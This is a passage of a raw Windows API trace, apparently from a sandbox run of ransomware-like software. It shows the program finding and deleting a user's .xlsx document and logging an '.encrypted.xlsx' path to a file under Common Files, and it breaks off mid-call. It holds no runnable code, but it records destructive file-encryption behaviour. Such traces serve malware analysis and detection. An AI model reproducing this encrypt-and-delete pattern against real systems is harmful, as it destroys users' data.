0x13 [0036.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.871] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0036.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.871] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.871] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.871] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFilePart=0x0) returned 0x3e [0036.872] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x15b03700, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0x7c2240 [0036.872] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmd_cmune5hcq1ezk.xlsx")) returned 1 [0036.873] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x15b03700, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0 [0036.873] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.873] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.873] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.876] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.876] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x120) returned 0x7c50e0 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.878] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0036.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.879] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x1ff0, lpOverlapped=0x0) returned 1 [0036.879] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1ff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0036.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.encrypted.xlsx\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0036.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f3630 [0036.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.encrypted.xlsx\r\n", cchWideChar=75, lpMultiByteStr=0x7f3630, cbMultiByte=75, 